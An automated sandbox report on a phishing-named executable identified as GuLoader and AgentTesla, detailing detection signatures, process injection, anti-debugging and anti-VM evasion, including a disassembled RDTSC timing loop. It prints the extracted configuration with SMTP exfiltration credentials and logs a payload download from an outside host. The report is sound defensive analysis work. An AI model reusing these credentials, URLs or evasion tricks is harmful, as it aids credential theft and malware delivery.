Play interactive tour

Edit tour

Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Sample Name:	HSBC Customer Information.exe
Analysis ID:	483511
MD5:	448f83467c61e465162daf7cf8d9e88f
SHA1:	c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:	4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Potential malicious icon found

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Tries to detect virtualization through RDTSC time measurements

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

HSBC Customer Information.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 448F83467C61E465162DAF7CF8D9E88F)

RegAsm.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)

conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 6140	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 6140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: HSBC Customer Information.exe.6392.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Multi AV Scanner detection for submitted file

Show sources

Source: HSBC Customer Information.exe	Virustotal: Detection: 25%			Perma Link
Source: HSBC Customer Information.exe	ReversingLabs: Detection: 20%

Machine Learning detection for sample

Show sources

Source: HSBC Customer Information.exe

Joe Sandbox ML: detected

Source: HSBC Customer Information.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443

Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: http://cthUYD.com
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin
Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0
Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

DNS traffic detected: queries for: qrextechnologies.com

Source: global traffic

HTTP traffic detected: GET /barrr09_HVPbNJre68.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qrextechnologies.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: HSBC Customer Information.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_004017AC	0_2_004017AC
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224282A	0_2_0224282A
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022428A3	0_2_022428A3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02245CAF	0_2_02245CAF
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022406C3	0_2_022406C3
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240ED2	0_2_02240ED2
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240F34	0_2_02240F34
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240702	0_2_02240702
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224651E	0_2_0224651E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_1DD747A0	25_2_1DD747A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 25_2_1DD74790	25_2_1DD74790

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Code function: 0_2_02245CAF NtAllocateVirtualMemory,

0_2_02245CAF

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process Stats: CPU usage > 98%

Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe
Source: HSBC Customer Information.exe	Binary or memory string: OriginalFilenameBlankningscu5.exe vs HSBC Customer Information.exe

Source: HSBC Customer Information.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: HSBC Customer Information.exe	Virustotal: Detection: 25%
Source: HSBC Customer Information.exe	ReversingLabs: Detection: 20%

Source: HSBC Customer Information.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_00407D36 push 0000000Fh; ret	0_2_00407D56
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_004059AE push ecx; ret	0_2_004059AF
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02241E3C push esp; ret	0_2_02241E9D
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224460E push ebp; iretd	0_2_022446A9
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02244412 push esp; retf	0_2_02244413
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_0224301F push ebx; iretd	0_2_02243026
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02240A5C push esi; retf	0_2_02240A5D
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022446B5 push ebp; iretd	0_2_022446A9
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02242D18 push ebx; iretd	0_2_02242D52
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02246B6D push ecx; retf	0_2_02246B6E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022441BE push ebx; iretd	0_2_0224435E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02241F89 push 0000001Dh; ret	0_2_02241F8B
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_02244192 push ebx; iretd	0_2_0224435E
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022467E2 pushad ; retf	0_2_022467F1
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Code function: 0_2_022445F1 push ebp; iretd	0_2_022446A9

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions: 0x00000000 rdtsc 0x00000002 cmp edx, 000000F3h 0x00000008 xor eax, edx 0x0000000a cmp cx, 00E8h 0x0000000f dec edi 0x00000010 cmp bx, 00DDh 0x00000015 fabs 0x00000017 jmp 00007FC36C4BB470h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FC36C4BB393h 0x00000022 cmp si, 00BBh 0x00000027 mov ebx, F06F76B6h 0x0000002c cmp dh, FFFFFFACh 0x0000002f sub ebx, 2716C148h 0x00000035 cmp ebx, 24h 0x00000038 xor ebx, 6F5BB001h 0x0000003e cmp di, 0030h 0x00000042 punpckldq mm1, mm7 0x00000045 jmp 00007FC36C4BB474h 0x00000047 xor ebx, A643056Fh 0x0000004d cmp ah, 00000026h 0x00000050 cmp cl, FFFFFF90h 0x00000053 rdtsc

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4332

Thread sleep time: -26747778906878833s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Window / User API: threadDelayed 684	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Window / User API: threadDelayed 9316	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9139	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 685	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

System information queried: ModuleInformation

Jump to behavior

Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Customer Information.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1000000

Jump to behavior

Source: C:\Users\user\Desktop\HSBC Customer Information.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'

Jump to behavior

Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Source: Yara match	File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
